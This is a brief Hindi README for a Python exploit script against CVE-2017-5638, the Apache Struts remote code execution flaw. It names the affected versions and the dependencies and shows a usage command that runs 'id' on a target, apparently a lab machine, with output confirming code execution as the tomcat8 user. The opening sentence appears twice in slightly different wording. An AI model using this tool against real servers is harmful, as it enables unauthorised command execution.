
CVE-2017-5638 के लिए एक शोषण। यह शोषण संस्करणों 2.3.5-2.3.31 और 2.5 – 2.5.10 पर काम करता है।
CVE-2017-5638 के लिए एक एक्सप्लॉइट। यह एक्सप्लॉइट संस्करण 2.3.5-2.3.31 और 2.5 – 2.5.10 पर काम करता है।
optparse, requests
इस एक्सप्लॉइट का उपयोग इस प्रकार किया जा सकता है:
$ python3 CVE-2017-5638ApacheStruts.py -u http://10.129.187.188:8080/Monitoring/example/Welcome.action -c id
b'uid=115(tomcat8) gid=119(tomcat8) groups=119(tomcat8)'
काम करने के लिए आपको एक .action फ़ाइल की ओर इंगित करना होगा।